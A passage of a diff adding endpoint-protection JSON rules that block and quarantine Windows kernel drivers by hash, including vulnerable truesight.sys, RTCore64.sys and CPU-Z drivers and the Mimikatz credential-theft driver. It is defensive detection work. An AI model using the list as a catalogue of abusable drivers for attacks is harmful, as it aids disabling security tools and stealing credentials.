+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816118Z",
+ "creation_date": "2026-03-23T11:45:30.816120Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816125Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9303894ee50d95911ccd4583b2aa5484db63de0d8f799b14854577e15914df2d",
+ "comment": "Vulnerable Kernel Driver (aka sysconp.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce1b53b4-f08c-5b62-948b-a45db7a77877",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494815Z",
+ "creation_date": "2026-03-23T11:45:31.494822Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0a01628d39cd0fd2542aceb122c84ff022417860480ca348ade49ca0ae6f5c4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce1e1fe9-f5e5-5d7c-8bc5-09fa9a03ea16",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617850Z",
+ "creation_date": "2026-03-23T11:45:29.617852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a89a6ab2fca486480b6e3dacf392d6ce0c59a5bdb4bcd18d672feb4ebb0543c",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce329b47-47aa-59a9-b141-a197b231c51c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492610Z",
+ "creation_date": "2026-03-23T11:45:31.492612Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492618Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18b794710453ffbf8ea6812b3c67f0834c5262547097e7509bc3d8e13aaa3500",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce3e4491-5fad-5e16-840e-acc9b5f7e447",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828737Z",
+ "creation_date": "2026-03-23T11:45:30.828739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58a4e00d40077cb1532967dc9a66d485a9e580a4f9d4ab4052f645bc76028c43",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce459142-5004-5235-8dc4-2f2f7152d10d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817515Z",
+ "creation_date": "2026-03-23T11:45:31.817517Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817523Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4bec310f9a33386df4085f4d4df5880572f2ba44ae258d466e2b0551ea5df9d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce48afdc-2747-5090-8157-f2dafcf192b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499349Z",
+ "creation_date": "2026-03-23T11:45:31.499352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499360Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cdb7d0ecd7c09135ffea8f715e1b52c9e193d87ee46f460d826c50b4578d1a9e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce49b158-22b6-537f-a1a9-ce79dc4aeb14",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455164Z",
+ "creation_date": "2026-03-23T11:45:30.455167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16b6be03495a4f4cf394194566bb02061fba2256cc04dcbde5aa6a17e41b7650",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce4eeabf-d1ad-51db-a76f-5876c15c7e49",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475923Z",
+ "creation_date": "2026-03-23T11:45:30.475927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e89cb7217ec1568b43ad9ca35bf059b17c3e26f093e373ab6ebdeee24272db21",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce4fc928-5627-54e4-88c3-facc56c5e687",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157205Z",
+ "creation_date": "2026-03-23T11:45:31.157207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96d381aa428e3d885b399285e19a8b6aeafc94d736d3575cd5af8f8f58c0d979",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce58d9f1-605e-5a80-a21c-84eb03f355f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483920Z",
+ "creation_date": "2026-03-23T11:45:31.483924Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5f6dc31336aaaa2fda0af4c38855cb33bdabc66faca07304bc163c490619500",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce63c5a3-c672-57ed-8455-28fccbd5b21b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490829Z",
+ "creation_date": "2026-03-23T11:45:31.490850Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490858Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe9520ae42fc9ea258ca7fd2054b4e05acc1aa45089a703fd486753eba57ab11",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce68c78e-37d5-56b9-89c8-5d3b922a1db5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153736Z",
+ "creation_date": "2026-03-23T11:45:31.153738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "201c02478e89e011a9a5c8f9d496ea8f10684c761ddeeaf14342cfb30c0003ca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce69fa95-d4b1-5062-b53b-e77be033e897",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824488Z",
+ "creation_date": "2026-03-23T11:45:31.824491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824499Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a9b1b00235f0814ccef667762cdecaae9c195e9165355f73125b4bb386d7b3c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce6a0e81-1215-5d2f-a38b-7bb41d9454ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970906Z",
+ "creation_date": "2026-03-23T11:45:29.970909Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "463829eecbdd9c72faa3a3cab55cb52c95e93c3b79bafe855e199354432e7f76",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce6f93fb-15eb-541a-895b-eed8f215b7ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479314Z",
+ "creation_date": "2026-03-23T11:45:30.479316Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16c63f5ebd96caecae3581a91b949ccc803cf7c18482448d19f9433d6d40ebee",
+ "comment": "Vulnerable Kernel Driver (aka VBoxTAP.sys) [https://www.loldrivers.io/drivers/f22e7230-5f32-4c4e-bc9d-9076ebf10baa/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce6fb95e-0f44-533a-a10f-3fc969feb434",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605522Z",
+ "creation_date": "2026-03-23T11:45:29.605524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32726f7b4f4c51dfe0c0de47408c6d88e8b1664ab10529f2f994bd0e1b5814e5",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce7924c3-5a86-573f-9dc1-55615a2df8af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155967Z",
+ "creation_date": "2026-03-23T11:45:31.155969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "925c0c27fdfbc02f3300954d6628a35479599ec1b28c6b899bf5ca12c4816097",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce79a240-6286-5ca6-9456-6637c047880c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984582Z",
+ "creation_date": "2026-03-23T11:45:29.984584Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e704bcd0526a76661be083041793be319773d2fed132e45435d800d6918532d",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce7bdd17-5738-5487-8217-7ea7e0015039",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461097Z",
+ "creation_date": "2026-03-23T11:45:30.461101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461110Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ac8e54be2804f5fa60d0d23a11ba323fba078a942c96279425aabad935b8236",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce7fd246-ecd2-5a57-997b-9d2d32ea9a56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610423Z",
+ "creation_date": "2026-03-23T11:45:29.610425Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610431Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5177a3b7393fb5855b2ec0a45d4c91660b958ee077e76e5a7d0669f2e04bcf02",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce84469e-175d-51e1-9e0d-483856c4895b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816190Z",
+ "creation_date": "2026-03-23T11:45:31.816193Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816201Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c4433e84f9db7a62daa9a681ae728530602a1b1e119a5a9d13ae4366df45c71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce856d80-4bd4-5bb1-b872-cc35a9ca1916",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475590Z",
+ "creation_date": "2026-03-23T11:45:30.475593Z",
